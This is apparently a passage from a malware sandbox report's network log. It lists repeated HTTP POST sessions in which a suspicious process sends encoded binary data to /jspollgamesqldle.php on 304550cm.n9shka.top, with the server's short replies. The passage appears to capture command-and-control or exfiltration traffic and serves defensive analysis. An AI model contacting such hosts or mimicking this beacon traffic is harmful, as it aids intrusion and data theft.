                                                          Date: Sun, 08 Sep 2024 09:52:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.46471580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:29.356218100 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:29.712657928 CEST2532OUTData Raw: 5e 5e 5c 52 5f 5e 5b 5c 5c 5a 51 56 57 5d 57 55 50 59 5e 51 54 5d 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\R_^[\\ZQVW]WUPY^QT]SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&8%>970]) 3&-47%*4#.Z?;Y$8.#G X/9
                                                          Sep 8, 2024 11:52:30.024229050 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:30.157253027 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.46471680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:30.279043913 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:30.634546041 CEST2528OUTData Raw: 5b 58 5c 52 5a 52 5e 5f 5c 5a 51 56 57 5b 57 56 50 50 5e 59 54 5d 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\RZR^_\ZQVW[WVPP^YT]SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,.?)74$*7Y'[87%9/["*+837$_.#G X/-
                                                          Sep 8, 2024 11:52:30.974498987 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:31.110347033 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.46471780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:31.218843937 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:31.572021961 CEST1400OUTData Raw: 5e 59 5c 53 5a 59 5e 5d 5c 5a 51 56 57 5b 57 53 50 59 5e 5e 54 58 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\SZY^]\ZQVW[WSPY^^TXS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\,&?)'73;)< 0*;7V$_(6=6+63^047.#G X/9
                                                          Sep 8, 2024 11:52:31.882287025 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:32.012661934 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 52 24 01 2d 1e 36 3d 37 52 3e 01 21 56 2e 3e 34 58 3e 17 36 18 28 23 16 54 3e 2c 22 58 3d 28 2d 07 2a 12 24 12 37 08 2c 04 32 25 28 5e 03 11 23 1c 23 2d 21 01 2a 17 0f 00 29 08 28 58 3e 11 3b 5a 36 37 3c 55 34 3b 20 1c 23 16 26 14 28 3a 2e 56 2d 24 35 06 2f 30 2e 56 35 1e 2d 57 0c 12 20 1a 3f 3e 2c 0b 37 23 07 5f 31 2d 3e 02 33 40 39 07 3d 2b 3a 1c 28 38 29 02 32 31 3b 12 27 04 39 5a 2b 3b 36 58 26 29 05 12 23 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &R$-6=7R>!V.>4X>6(#T>,"X=(-*$7,2%(^##-!*)(X>;Z67<U4; #&(:.V-$5/0.V5-W ?>,7#_1->3@9=+:(8)21;'9Z+;6X&)#-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.46471880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:31.230880976 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:31.587641001 CEST2532OUTData Raw: 5e 5e 5c 52 5a 5d 5b 58 5c 5a 51 56 57 5d 57 53 50 5f 5e 5e 54 5e 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\RZ][X\ZQVW]WSP_^^T^S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^/=]=) 4?(/4$/;';R%9,"%?3^$,-+#G X/9
                                                          Sep 8, 2024 11:52:31.895951986 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.46471980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:32.136959076 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:32.493875980 CEST2532OUTData Raw: 5b 58 5c 5e 5a 53 5b 5c 5c 5a 51 56 57 5f 57 53 50 50 5e 5e 54 58 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\^ZS[\\ZQVW_WSPP^^TXSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,=^=_+!3,])]$/287T$)8!=1^<&0''8.#G X/1
                                                          Sep 8, 2024 11:52:32.802190065 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:32.936686993 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.46472080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:33.060604095 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:33.415863037 CEST2532OUTData Raw: 5b 5b 5c 54 5a 52 5e 5b 5c 5a 51 56 57 59 57 5d 50 5f 5e 5c 54 55 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[\TZR^[\ZQVWYW]P_^\TUSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,W!Z=)70,*%/%/7 %)7".=)53'Q?9;#G X/)
                                                          Sep 8, 2024 11:52:33.743390083 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:33.876543999 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.46472180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:33.997539997 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:34.353260040 CEST2532OUTData Raw: 5b 5b 5c 54 5f 5e 5b 51 5c 5a 51 56 57 5a 57 52 50 5d 5e 5e 54 58 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[\T_^[Q\ZQVWZWRP]^^TXSBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%],1-Z)?_7?)/<'?&8$ 3_#"-[(%;'4$/;#G X/%
                                                          Sep 8, 2024 11:52:34.689589024 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:34.822362900 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.46472280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:34.950304985 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:35.306413889 CEST2532OUTData Raw: 5b 59 5c 55 5f 5e 5e 5f 5c 5a 51 56 57 5f 57 51 50 51 5e 5c 54 5f 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Y\U_^^_\ZQVW_WQPQ^\T_SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%;"&*9\70)4%?=/4+U$+""+&/^'8\.#G X/1
                                                          Sep 8, 2024 11:52:35.611612082 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:35.740118027 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.46472380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:35.879992008 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:36.228388071 CEST2532OUTData Raw: 5e 5e 59 53 5a 5a 5e 5d 5c 5a 51 56 57 5c 57 56 50 58 5e 5f 54 59 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^YSZZ^]\ZQVW\WVPX^_TYSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^/!Z=8400Z>?7Y3Y&;$0)Y6.( &'/;#G X/
                                                          Sep 8, 2024 11:52:36.557935953 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:36.690263033 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.46472480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:36.816823959 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.46472580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:37.031316042 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:37.384608030 CEST1412OUTData Raw: 5e 5d 5c 50 5f 5a 5b 58 5c 5a 51 56 57 5f 57 52 50 5c 5e 51 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\P_Z[X\ZQVW_WRP\^QT]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z/!!\=;\4#,]*#_3?=-4;V$+Y".6(&/$'8_.#G X/1
                                                          Sep 8, 2024 11:52:37.696036100 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:37.824666977 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 1d 27 2f 2e 01 20 3e 27 1f 2b 3c 21 55 2e 13 27 00 2a 39 26 1c 3e 33 16 1e 3e 06 2e 58 2a 2b 07 09 29 2f 2f 06 34 32 3b 11 25 25 28 5e 03 11 23 5f 21 58 3e 12 3d 07 04 59 2a 31 33 01 29 2c 3b 11 21 1a 3c 10 23 3b 2b 06 23 06 35 0a 3c 00 21 09 3b 42 39 06 2e 1d 00 1c 36 24 2d 57 0c 12 23 09 2b 10 23 19 23 1d 29 15 31 07 29 5c 30 35 26 5e 2a 3b 31 0c 28 16 2e 10 25 54 20 08 27 3d 39 13 3d 01 26 14 27 07 2c 01 36 07 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &'/. >'+<!U.'*9&>3>.X*+)//42;%%(^#_!X>=Y*13),;!<#;+#5<!;B9.6$-W#+##)1)\05&^*;1(.%T '=9=&',6$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.46472680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:37.152292967 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:37.509574890 CEST2528OUTData Raw: 5b 51 59 56 5a 5c 5b 51 5c 5a 51 56 57 5b 57 54 50 59 5e 59 54 5b 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [QYVZ\[Q\ZQVW[WTPY^YT[SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z;.)!#<),'9[/7'9!X5(;^&'_9#G X/%
                                                          Sep 8, 2024 11:52:37.821981907 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:37.949392080 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.46472780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:38.073802948 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:38.431441069 CEST2532OUTData Raw: 5e 5a 59 54 5a 5f 5b 50 5c 5a 51 56 57 5d 57 55 50 58 5e 5d 54 5a 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYTZ_[P\ZQVW]WUPX^]TZSATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%];)9 #08\*,3%<5,'''#>_?%?_3.#G X/9
                                                          Sep 8, 2024 11:52:38.755870104 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:38.962743044 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.46472880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:39.092061043 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:39.447041035 CEST2532OUTData Raw: 5b 50 5c 56 5a 5f 5e 58 5c 5a 51 56 57 5d 57 50 50 50 5e 5a 54 5b 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\VZ_^X\ZQVW]WPPP^ZT[SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_8-Z>+ 8Z=39,$<39+X">5_?&80[-#G X/9
                                                          Sep 8, 2024 11:52:39.785311937 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:39.991641998 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.46472980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:40.121556997 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
